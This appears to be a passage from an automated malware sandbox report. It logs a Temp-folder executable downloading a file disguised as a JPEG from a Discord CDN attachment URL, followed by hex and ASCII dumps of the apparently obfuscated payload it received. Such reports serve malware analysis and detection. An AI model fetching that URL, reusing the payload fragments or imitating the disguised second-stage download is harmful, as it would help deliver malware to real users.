20 4e 72 20 72 20 Data Ascii: M Y C N V NI rN NY C r N NI LM VN NI rY N NI rW NI YL NI YM c C N NM cN NI LM Y C N V NI cY r C C NI cW W C L N NI cY Nc V Nc V M C V N NI cW NI cY r C N N Nr L c VW Y L c NM Yc r LV C VW Y Y LV N N VW Y r LV N N Nr c LV N VW Y VW Y r C C VW Y L C C Nr r

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49841	162.159.129.233	443	C:\Users\user\AppData\Local\Temp\3C84.exe

Timestamp	kBytes transferred	Direction	Data
2021-10-29 18:50:16 UTC	1652	OUT	GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1 Host: cdn.discordapp.com Connection: Keep-Alive
2021-10-29 18:50:16 UTC	1652	IN	HTTP/1.1 200 OK Date: Fri, 29 Oct 2021 18:50:16 GMT Content-Type: image/jpeg Content-Length: 1023400 Connection: close CF-Ray: 6a5e96afb9d76922-FRA Accept-Ranges: bytes Age: 281712 Cache-Control: public, max-age=31536000 ETag: "a79ffe2a90ab83e54cd38dd94a2b6a6d" Expires: Sat, 29 Oct 2022 18:50:16 GMT Last-Modified: Tue, 26 Oct 2021 11:56:33 GMT Vary: Accept-Encoding CF-Cache-Status: HIT Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Cf-Bgj: h2pri Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" x-goog-generation: 1635249393939568 x-goog-hash: crc32c=mLSBFQ== x-goog-hash: md5=p5/+KpCrg+VM043ZSitqbQ== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 1023400 X-GUploader-UploadID: ADPycduXLAU0rhkOYYdjTYv8nzQOrUiGMR0rq3qWR-Mu3t2dKo7sgrujSRwPDi2ARPYGwmCnqDDiBBlucDqiDRky3RaT0EIS3w X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RDE1FylaQrEci%2F7zhABYM6lA27ZPlt6NEX8r5ek9v3xCLfKg2QAKJwbeuWkqmwRh6u%2BNeFj04hk5UiMj5ZKA8eh4FtG4IKE0jLIOXVKydZbF%2FVrk91zYLQ0KpWToSwOF81Lutw%3D%3D"}],"group":"cf-nel","max_age":604800}
2021-10-29 18:50:16 UTC	1653	IN	Data Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
2021-10-29 18:50:16 UTC	1653	IN	Data Raw: 78 4f 6f 45 4b 59 52 74 6b 51 2d 74 74 20 51 78 20 4f 4b 4b 20 78 20 45 20 78 20 78 20 78 20 4b 20 78 20 78 20 78 20 6f 59 59 20 6f 59 59 20 78 20 78 20 4f 6b 4b 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 52 4b 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 4f 6f 6b 20 78 20 78 20 78 20 4f 4b 20 45 4f 20 4f 6b 52 20 4f 4b 20 78 20 4f 6b 78 20 51 20 6f 78 59 20 45 45 20 4f 6b 4b 20 4f 20 74 52 20 6f 78 59 20 45 45 20 6b 4b 20 4f 78 4b 20 4f 78 59 20 4f 4f 59 20 45 6f 20 4f 4f 6f 20 4f 4f 4b 20 4f 4f 4f 20 4f 78 45 20 4f 4f 4b 20 51 74 20 4f 78 51 20 45 6f 20 51 51 20 51 74 20 4f 4f 78 20 4f Data Ascii: xOoEKYRtkQ-tt Qx OKK x E x x x K x x x oYY oYY x x OkK x x x x x x x RK x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x x Ook x x x OK EO OkR OK x Okx Q oxY EE OkK O tR oxY EE kK OxK OxY OOY Eo OOo OOK OOO OxE OOK Qt OxQ Eo QQ Qt OOx O
2021-10-29 18:50:16 UTC	1654	IN	Data Raw: 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 78 20 6f 59 20 4b 78 20 6f 6f 51 20 4f 78 51 20 4f 4f 59 20 59 78 20 4b 6b 20 59 78 20 59 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 4b 52 20 4f 4b 45 20 59 78 20 4b 6b 20 4f 45 6b 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 6f 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 74 52 20 59 78 20 59 4b 20 6b 4b 20 4f 6f 4b 20 4f 78 52 Data Ascii: x x x x x x x x x x x x x oY Kx ooQ OxQ OOY Yx Kk Yx Yx kK OOK OOt OKR OKE Yx Kk OEk YK kK OOK OOt OxQ OOo Yx OOo Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx OtR Yx YK kK OoK OxR
2021-10-29 18:50:16 UTC	1656	IN	Data Raw: 59 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 4f 6b 20 59 4b 20 6b 4b 20 4f 6b 20 51 4f 20 45 4f 20 45 20 52 4b 20 6b 45 20 59 78 20 59 4b 20 6b 4b 20 4f 74 6b 20 4f 4f 6b 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 4b 78 20 59 4f 20 59 4b 20 6b 4b 20 4f 4f 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 4f 51 78 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 59 45 20 4f 78 51 20 4f 4f 6f 20 4f 4f 4b 20 45 78 20 52 4b 20 6b 45 20 59 52 20 6f 51 20 6f 6f 20 4f 78 51 20 4f 4f 6f 20 52 6f 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4b 52 Data Ascii: YO YK kK OOk OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Ok YK kK Ok QO EO E RK kE Yx YK kK Otk OOk OxQ OOo Yx oKx YO YK kK OOk OOt OxQ OOo OQx KQ Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK YE OxQ OOo OOK Ex RK kE YR oQ oo OxQ OOo Ro Kk Yx YK kK OKR
2021-10-29 18:50:16 UTC	1657	IN	Data Raw: 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f Data Ascii: OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OOt OxQ OOo Yx Kk Yx YK kK OOK OO
2021-10-29 18:50:16 UTC	1658	IN	Data Raw: 20 4f 4f 4b 20 59 20 45 4f 20 4b 4f 20 59 78 20 4b 6b 20 52 52 20 74 6f 20 74 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 6b 6b 20 4b 59 20 4b 6b 20 59 78 20 52 78 20 6f 4b 52 20 6b 74 20 51 6b 20 45 4f 20 4f 20 59 78 20 4b 6b 20 52 52 20 52 6b 20 6f 59 4f 20 4f 4f 4b 20 4f 4f 74 20 6f 51 20 4f 4b 20 4b 4b 20 4b 6b 20 59 78 20 52 78 20 4f 6f 4b 20 4f 78 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 4f 4b 4b 20 6f 4f 20 4b 6f 20 52 6b 20 4f 4b 74 20 4f 4f 4b 20 4f 4f 74 20 6f 51 20 6f 20 59 45 20 4b 51 20 59 78 20 74 78 20 4b 6f 20 4f 78 6b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 4b 74 20 59 78 20 59 4b 20 51 4b 20 6f 78 6b 20 51 45 20 4f 45 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 6f 6f 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 51 74 20 74 6f 20 59 6f 20 Data Ascii: OOK Y EO KO Yx Kk RR to tK OOK OOt OxE kk KY Kk Yx Rx oKR kt Qk EO O Yx Kk RR Rk oYO OOK OOt oQ OK KK Kk Yx Rx OoK OxQ OOt OxQ Ooo OKK oO Ko Rk OKt OOK OOt oQ o YE KQ Yx tx Ko Oxk OOt OxQ Ooo oR Kt Yx YK QK oxk QE OEE OOo Yx YK QE oo kK OOK Oot Qt to Yo
2021-10-29 18:50:16 UTC	1660	IN	Data Raw: 51 74 20 59 59 20 45 45 20 59 4b 20 6f 78 78 20 6b 6f 20 4f 52 4b 20 4f 4f 52 20 4f 78 51 20 4f 4f 6b 20 52 59 20 45 78 20 59 78 20 59 4b 20 51 4b 20 4f 6f 20 4f 45 51 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4f 20 45 4f 20 45 45 20 4f 4f 4b 20 4f 6f 20 4f 4b 6f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 78 52 20 59 6f 20 6f 45 59 20 6b 59 20 4f 4f 4b 20 4f 4f 59 20 45 78 20 51 59 20 59 78 20 4b 6b 20 59 52 20 4f 51 20 6f 4f 6f 20 4f 4b 78 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 52 20 59 4f 20 59 78 20 59 4b 20 4f 6f 74 20 6f 51 20 51 59 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 45 45 20 59 59 20 45 51 20 6b 78 20 4f 4b 78 20 4f 4f 59 20 4f 6b 52 20 4f 4f 45 20 59 78 20 59 4b 20 52 59 20 52 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 51 20 4f 4b 45 20 59 78 20 4b 6b 20 Data Ascii: Qt YY EE YK oxx ko ORK OOR OxQ OOk RY Ex Yx YK QK Oo OEQ OxQ OOo YK oO EO EE OOK Oo OKo OxQ OOo YK oxR Yo oEY kY OOK OOY Ex QY Yx Kk YR OQ oOo OKx OOt OxQ OOR oR YO Yx YK Oot oQ QY Oxk OOo Yo EE YY EQ kx OKx OOY OkR OOE Yx YK RY R kK OOK Oot OQ OKE Yx Kk
2021-10-29 18:50:16 UTC	1661	IN	Data Raw: 4f 4f 4b 20 4f 4f 74 20 4f 78 45 20 51 45 20 59 45 20 59 4b 20 52 45 20 6f 45 59 20 4f 6f 74 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 4f 4f 4b 20 6f 52 20 59 52 20 59 78 20 59 4b 20 6b 6f 20 4f 6f 52 20 4f 4f 4b 20 45 78 20 6f 4f 51 20 59 78 20 4b 6b 20 59 6f 20 45 74 20 6b 78 20 51 51 20 4f 4f 45 20 4f 4f 45 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 6f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 45 59 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 74 59 20 4f 78 6f 20 45 45 20 59 45 20 4f 78 20 6f 45 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 45 78 20 59 51 20 59 4f 20 4b 6b 20 59 6f 20 45 74 20 6b 6f 20 51 51 20 4f 4f 59 20 4f 6f 4b 20 Data Ascii: OOK OOt OxE QE YE YK RE oEY Oot OOY OOt OxQ OOK oR YR Yx YK ko OoR OOK Ex oOQ Yx Kk Yo Et kx QQ OOE OOE oYE OxK Kk Yx YY OOE ORo ooo OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk QE OEY kK OOK OOY tY Oxo EE YE Ox oEK kK OOK OOt Ex YQ YO Kk Yo Et ko QQ OOY OoK
2021-10-29 18:50:16 UTC	1662	IN	Data Raw: 4f 74 20 4f 78 51 20 4f 4f 6f 20 52 4f 20 4b 6b 20 59 78 20 59 59 20 74 51 20 52 52 20 4f 4f 59 20 4f 78 51 20 59 6f 20 4b 6b 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 78 78 20 45 78 20 74 51 20 59 78 20 4b 6b 20 59 52 20 52 78 20 6b 52 20 4f 4f 4f 20 6f 4b 6b 20 59 59 20 4f 4f 6f 20 59 78 20 4b 51 20 6f 45 20 6f 45 78 20 4f 4b 78 20 4f 4f 4b 20 4f 4f 74 20 4f 78 59 20 6b 6b 20 59 20 4b 6b 20 59 78 20 52 78 20 45 51 20 74 4b 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 6f 52 20 51 20 59 78 20 59 4b 20 51 4b 20 4f 6f 4f 20 4f 4f 4b 20 52 51 20 74 4b 20 59 78 20 4b 6b 20 59 52 20 6f 74 20 6b 45 20 4f 4f 52 20 4f 6f 78 20 4f 74 52 20 51 52 20 4b 6b 20 4b 6b 20 59 78 20 59 6f 20 4f 6f 4b 20 4f 6f 6f 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 52 6f 20 59 59 Data Ascii: Ot OxQ OOo RO Kk Yx YY tQ RR OOY OxQ Yo Kk Kk Yx YE kK OOK Oxx Ex tQ Yx Kk YR Rx kR OOO oKk YY OOo Yx KQ oE oEx OKx OOK OOt OxY kk Y Kk Yx Rx EQ tK OOt OxQ Ooo oR Q Yx YK QK OoO OOK RQ tK Yx Kk YR ot kE OOR Oox OtR QR Kk Kk Yx Yo OoK Ooo OOt OxQ OOk Ro YY
2021-10-29 18:50:16 UTC	1664	IN	Data Raw: 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 6f 20 74 6f 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 6b 45 20 51 51 20 4f 4f 45 20 4f 6f 4b 20 4f 4f 74 20 4b 59 20 52 45 20 4f 51 4f 20 4f 78 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 52 20 74 6f 20 4f 52 78 20 4f 59 59 20 4b 6b 20 59 78 20 59 78 20 4f 6f 4b 20 52 51 20 4f 4f 74 20 4f 78 51 20 4f 6f 6f 20 52 59 20 6b 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 6f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 59 52 20 6f 52 20 4b 6b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 6f 20 74 4b 20 59 4f 20 4b 6b 20 59 6f 20 45 51 20 6b 45 20 51 74 20 4f 4f 59 20 4f 6f 4b 20 4f 4f 6b 20 51 45 20 59 20 59 4f 20 59 4b 20 6b 6f 20 4f 78 78 20 45 Data Ascii: Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot o to YO Kk Yo EQ kE QQ OOE OoK OOt KY RE OQO Oxk kK OOK OOR to ORx OYY Kk Yx Yx OoK RQ OOt OxQ Ooo RY k Yx YK QK oQ oOt OxQ OOo Yo YR oR Kk kK OOK OOY o tK YO Kk Yo EQ kE Qt OOY OoK OOk QE Y YO YK ko Oxx E
2021-10-29 18:50:16 UTC	1665	IN	Data Raw: 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4f 51 45 20 4f 4f 6f 20 59 78 20 59 4b 20 51 45 20 4f 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 6f 52 20 4f 4f 51 20 45 59 20 59 59 20 4b 45 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 4f 59 51 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 74 20 4f 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6f 52 20 4b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 45 4f 20 4b 4f 20 52 51 20 4f 4f 74 20 4f 78 6b 20 6f 6f 4b 20 4b 6f 20 59 78 20 4b 6b 20 59 4f 20 4f 51 20 4f 45 6f 20 4f 4b 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 52 20 6f 52 20 74 20 59 78 20 59 4b 20 51 4b 20 4f 20 74 74 20 4f 78 51 20 4f 4f 6f 20 59 52 20 51 59 20 4f 4f 4b Data Ascii: OOo YR Rt Ox YK kK Oox oR OQE OOo Yx YK QE OE kK OOK Oot OoR OOQ EY YY KE Okt OK OOK OOt Oxk kY ooR OYQ Yx YK kx Qx RR OxQ OOo YR Rt Ox YK kK Oox oR KY OOo Yx Yk EO KO RQ OOt Oxk ooK Ko Yx Kk YO OQ OEo OKK OOt OxQ OOR oR t Yx YK QK O tt OxQ OOo YR QY OOK
2021-10-29 18:50:16 UTC	1666	IN	Data Raw: 20 6f 59 45 20 4f 78 4b 20 4b 6b 20 59 78 20 59 59 20 4f 4f 45 20 4f 52 6f 20 4f 59 74 20 4f 78 51 20 4f 4f 6f 20 59 4b 20 6f 4b 20 59 20 59 4b 20 6b 4b 20 4f 6f 78 20 52 20 6b 59 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 78 4f 20 6b 6b 20 59 6f 20 4b 6b 20 59 78 20 4b 6b 20 45 6b 20 4f 20 4f 4f 51 20 4f 78 51 20 78 20 74 52 20 4b 52 20 59 78 20 59 4b 20 51 4b 20 6f 51 20 4f 78 52 20 4f 78 51 20 4f 4f 6f 20 59 52 20 45 59 20 59 45 20 52 51 20 4f 52 20 4f 4f 59 20 4f 4f 74 20 4f 78 74 20 51 51 20 59 6b 20 45 45 20 59 6b 20 45 51 20 6b 78 20 51 51 20 4f 4f 6f 20 4f 4f 4b 20 4f 6f 4b 20 4f 51 4f 20 4f 78 52 20 59 78 20 59 4b 20 6b 59 20 6b 74 20 4f 52 59 20 6f 78 45 20 4f 4f 6f 20 59 78 20 59 6f 20 6f 52 20 4f Data Ascii: oYE OxK Kk Yx YY OOE ORo OYt OxQ OOo YK oK Y YK kK Oox R kY OOo Yx Yk QE OYK kK OOK OOY OxO kk Yo Kk Yx Kk Ek O OOQ OxQ x tR KR Yx YK QK oQ OxR OxQ OOo YR EY YE RQ OR OOY OOt Oxt QQ Yk EE Yk EQ kx QQ OOo OOK OoK OQO OxR Yx YK kY kt ORY oxE OOo Yx Yo oR O
2021-10-29 18:50:16 UTC	1668	IN	Data Raw: 20 4f 20 4f 20 59 74 20 6b 74 20 51 78 20 52 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 59 78 20 6f 52 20 4b 78 20 6b 4b 20 4f 4f 4b 20 4f 4f 59 20 4f 78 45 20 51 4f 20 52 78 20 59 78 20 45 52 20 45 4b 20 4f 6f 4b 20 6b 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6b 20 51 45 20 4f 4f 20 59 78 20 59 4b 20 51 4b 20 4f 6f 78 20 4f 74 4f 20 4f 4f 78 20 6b 52 20 6f 45 52 20 4b 6b 20 59 6f 20 6f 6b 20 6b 59 20 51 6b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 4b 20 59 78 20 45 20 4f 4f 4f 20 4f 4f 4b 20 4f 4f 6b 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 45 45 20 52 20 6b 52 20 4f 4f 4b 20 6b 6f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 59 59 20 59 78 20 59 4b 20 52 51 20 4f 78 4f 20 4f 6f 74 20 4f 4f 4f 20 45 4f 20 4f 6f 52 20 4b 6b 20 59 78 20 52 78 20 51 59 20 6b 51 20 Data Ascii: O O Yt kt Qx Ro OxQ OOo YR Yx oR Kx kK OOK OOY OxE QO Rx Yx ER EK OoK kK OOt OxQ OOk QE OO Yx YK QK Oox OtO OOx kR oER Kk Yo ok kY Qk OOt OxQ OOo Yx YK Yx E OOO OOK OOk Qk OOo Yx KQ EE R kR OOK ko OxQ OOo Yx YY Yx YK RQ OxO Oot OOO EO OoR Kk Yx Rx QY kQ
2021-10-29 18:50:16 UTC	1669	IN	Data Raw: 20 52 78 20 4f 45 6b 20 4f 4f 45 20 6b 45 20 4f 74 51 20 4f 4f 6f 20 6f 45 52 20 59 4f 20 6f 78 20 6f 45 6f 20 6b 4b 20 4f 4f 52 20 51 59 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4f 4f 45 20 52 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 74 20 4b 51 20 59 78 20 59 4b 20 74 52 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 6b 45 20 59 4f 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 51 6b 20 4f 4f 6f 20 59 78 20 4b 51 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 6f 4f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 4b 20 59 4f 20 59 4b 20 6b 4b 20 51 78 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 4b 51 20 4b 6b 20 59 78 20 59 4b 20 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 4f 78 74 20 6f 20 59 4f 20 59 78 20 74 59 20 6b 4b 20 4f 4f 4b Data Ascii: Rx OEk OOE kE OtQ OOo oER YO ox oEo kK OOR QY OxQ OOo Yx OOE R YK kK OOK OOt OxQ OOo Yt KQ Yx YK tR OOK OOt OxQ kE YO Kk Yx YE kK OOK OOt Qk OOo Yx KQ Yx YK kK OOK OoO OxQ OOo Yx KK YO YK kK Qx OOR OxQ OOo KQ Kk Yx YK QK OOK OOt Oxk Oxt o YO Yx tY kK OOK
2021-10-29 18:50:16 UTC	1670	IN	Data Raw: 20 4f 4f 6f 20 4b 51 20 59 6b 20 59 78 20 59 4b 20 6b 59 20 4f 78 59 20 52 51 20 4f 78 59 20 4f 4f 6f 20 4f 4f 4b 20 4b 51 20 59 78 20 59 4b 20 51 59 20 4f 4f 4b 20 4f 4f 74 20 4f 6f 4b 20 45 20 4f 6f 4f 20 4b 51 20 59 78 20 4b 6b 20 51 4b 20 4f 4f 6f 20 6f 52 20 59 6f 20 4f 4f 6f 20 59 78 20 59 6b 20 51 45 20 4f 78 51 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 6f 20 74 6f 20 4f 4b 59 20 4b 6b 20 59 78 20 59 4b 20 6b 45 20 6f 51 20 4f 6f 6f 20 4f 78 51 20 4f 4f 6f 20 59 52 20 52 6b 20 45 74 20 59 4b 20 6b 4b 20 4f 4f 59 20 4f 6f 4f 20 4f 78 4f 20 45 4f 20 4f 4f 78 20 4b 6b 20 59 78 20 52 78 20 45 6b 20 6f 4b 74 20 4f 4f 51 20 4f 78 51 20 78 20 6f 52 20 4f 78 51 20 59 78 20 59 4b 20 51 4b 20 51 4b 20 4f 6f 4f 20 4f 78 74 20 4f 6f 78 20 51 45 20 4f 4f 78 20 Data Ascii: OOo KQ Yk Yx YK kY OxY RQ OxY OOo OOK KQ Yx YK QY OOK OOt OoK E OoO KQ Yx Kk QK OOo oR Yo OOo Yx Yk QE OxQ kK OOK Oot Oxo to OKY Kk Yx YK kE oQ Ooo OxQ OOo YR Rk Et YK kK OOY OoO OxO EO OOx Kk Yx Rx Ek oKt OOQ OxQ x oR OxQ Yx YK QK QK OoO Oxt Oox QE OOx
2021-10-29 18:50:16 UTC	1672	IN	Data Raw: 59 78 20 59 78 20 4f 4f 45 20 51 59 20 51 6b 20 74 59 20 4f 4b 20 59 4f 20 4b 51 20 59 78 20 59 78 20 4f 74 78 20 4f 4f 52 20 4f 59 4f 20 4f 78 6b 20 4f 4f 6f 20 59 6f 20 52 74 20 4b 78 20 59 4b 20 6b 4b 20 4f 6f 78 20 6b 78 20 6f 45 74 20 4f 4f 4b 20 59 4f 20 4b 6b 20 59 4b 20 45 78 20 6b 59 20 4f 4f 4b 20 4f 4f 74 20 74 78 20 45 4f 20 4b 52 20 4b 6b 20 59 78 20 52 78 20 51 59 20 74 4b 20 52 4b 20 4f 78 6b 20 4f 4f 6f 20 59 78 20 59 59 20 51 45 20 4b 45 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 51 74 20 4f 6f 78 20 4b 6f 20 45 51 20 45 74 20 4f 6b 74 20 4f 6f 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 45 52 20 4b 74 20 4b 6f 20 4f 6b 74 20 4f 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 6b 59 20 6f 6f 52 20 6f 4b 4b 20 59 78 20 59 4b 20 6b 78 20 51 78 20 52 Data Ascii: Yx Yx OOE QY Qk tY OK YO KQ Yx Yx Otx OOR OYO Oxk OOo Yo Rt Kx YK kK Oox kx oEt OOK YO Kk YK Ex kY OOK OOt tx EO KR Kk Yx Rx QY tK RK Oxk OOo Yx YY QE KE kK OOK Oot Qt Oox Ko EQ Et Okt Oo OOK OOt Oxk kY ER Kt Ko Okt OK OOK OOt Oxk kY ooR oKK Yx YK kx Qx R
2021-10-29 18:50:16 UTC	1673	IN	Data Raw: 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 74 6f 20 4f 78 51 20 4f 4f 6f 20 59 78 20 6f 74 20 59 4f 20 59 4b 20 6b 4b 20 6f 52 20 4f 4f 52 20 4f 78 51 20 4f 4f 6f 20 4b 51 20 4b 6b 20 59 78 20 59 4b 20 51 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 6b 20 4f 4f 4b 20 59 78 20 4b 6b 20 59 78 20 74 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4b 6f 20 4f 4f 45 20 59 78 20 4b 6b 20 74 4b 20 59 59 20 6b 4b 20 4f 4f 4b 20 4f 6f 74 20 4f 78 51 20 4f 4f 6f 20 59 78 20 4b 6b 20 59 78 20 59 4b 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 4f 78 51 20 4f 4f 6f 20 59 6f 20 4b 6b 20 59 78 20 59 4b 20 4b 6f 20 4f 4f 59 20 4f 4f 74 20 4f 78 51 20 6f 4b 4b 20 59 4f 20 4b 6b 20 59 78 20 59 45 20 6b 4b 20 4f 4f 4b 20 4f 4f 74 20 51 6b 20 4f 4f 6f 20 59 78 Data Ascii: t OxQ OOo Yx Kk Yx YK kK OOK to OxQ OOo Yx ot YO YK kK oR OOR OxQ OOo KQ Kk Yx YK QK OOK OOt 